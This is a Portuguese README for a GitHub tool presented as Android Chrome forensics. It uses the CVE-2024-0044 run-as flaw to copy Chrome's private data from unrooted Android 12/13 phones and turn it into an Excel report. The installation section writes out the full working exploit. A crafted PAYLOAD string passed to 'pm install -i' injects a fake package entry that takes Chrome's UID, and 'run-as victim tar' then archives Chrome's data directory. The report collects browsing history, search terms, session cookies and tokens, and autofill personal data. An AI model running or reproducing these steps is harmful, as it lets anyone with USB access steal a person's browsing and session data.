
Uma ferramenta robusta de forense digital para extrair e analisar artefatos do Google Chrome em dispositivos Android.
Uma ferramenta robusta de forense digital para extrair e analisar artefatos do Google Chrome em dispositivos Android
Recursos • Instalação • Uso • Documentação
Autor: JackTekno
GitHub: github.com/JackTekno
Esta ferramenta utiliza a vulnerabilidade CVE-2024-0044 (Run-as) para contornar restrições de permissão em dispositivos Android 12/13 sem root, permitindo a extração forense de dados do Google Chrome. A ferramenta analisa bancos de dados SQLite brutos e gera relatórios de análise abrangentes.

Fluxo de trabalho completo da análise forense, da aquisição ao relatório
A ferramenta gera um relatório Excel abrangente (result_chrome_forensic.xlsx) com as seguintes planilhas:
F-Droid.apk)Clone o repositório
git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
cd Chrome-Forensic_CVE-2024-0044
Instale as dependências
pip install -r requirements.txt
# Push a dummy APK to temporary folder
adb push F-Droid.apk /data/local/tmp/base.apk
adb shell pm list packages -U | grep com.android.chrome
# Output example: package:com.android.chrome uid:10129
# Note the UID (e.g., 10129)
⚠️ Substitua
10129pelo UID real do Chrome do Passo 3
adb shell
# Inside ADB Shell:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
# Trigger the package manager
pm install -i "$PAYLOAD" /data/local/tmp/base.apk
# Still inside ADB Shell
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar
# Exit ADB Shell
exit
adb pull /data/local/tmp/chrome.tar .
Extraia o arquivo 'chrome.tar' na pasta do projeto. Você não precisa mover os arquivos manualmente. O script Python encontrará automaticamente os arquivos de banco de dados dentro das pastas extraídas.
tar -xf chrome.tar
Execute a ferramenta de análise forense:
python3 chrome_forensic.py
A ferramenta analisará os arquivos de banco de dados e gerará result_chrome_forensic.xlsx no mesmo diretório.
⚠️ IMPORTANTE: Esta ferramenta foi projetada apenas para fins educacionais e de análise forense autorizada.
- Use apenas em dispositivos que você possui ou para os quais tenha permissão explícita por escrito para analisar
- O acesso não autorizado a dispositivos digitais pode violar as leis da sua jurisdição
- Os autores não assumem responsabilidade pelo uso indevido desta ferramenta
Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.
Este projeto está licenciado sob a GNU General Public License v3.0. Consulte o arquivo LICENSE para obter detalhes.
A prova de conceito do método de aquisição foi resumida e compartilhada por Tinyhack.com.
Feito com ❤️ por JackTekno
⭐ Dê uma estrela neste repositório • 🐛 Reportar Bug • 💡 Solicitar Recurso
| Nome da Planilha | Descrição |
|---|
| 📖 Histórico de Navegação | Linha do tempo detalhada de URLs visitadas |
| 📈 Análises – Principais Sites | Ranking estatístico dos domínios mais visitados |
| ⚠️ ALERTAS – Suspeitos | URLs sinalizadas automaticamente (hacking, drogas, conteúdo adulto) |
| 📥 Downloads | Histórico de downloads com caminhos e tamanhos de arquivos |
| 🔍 Termos de Pesquisa | Consultas de pesquisa do usuário na omnibox/Google |
| 🍪 Cookies e Sessões | Tokens de sessão e metadados de cookies (criptografados em Hex) |
| ✍️ Dados de Preenchimento Automático | Dados de formulários salvos (nomes, endereços, etc.) |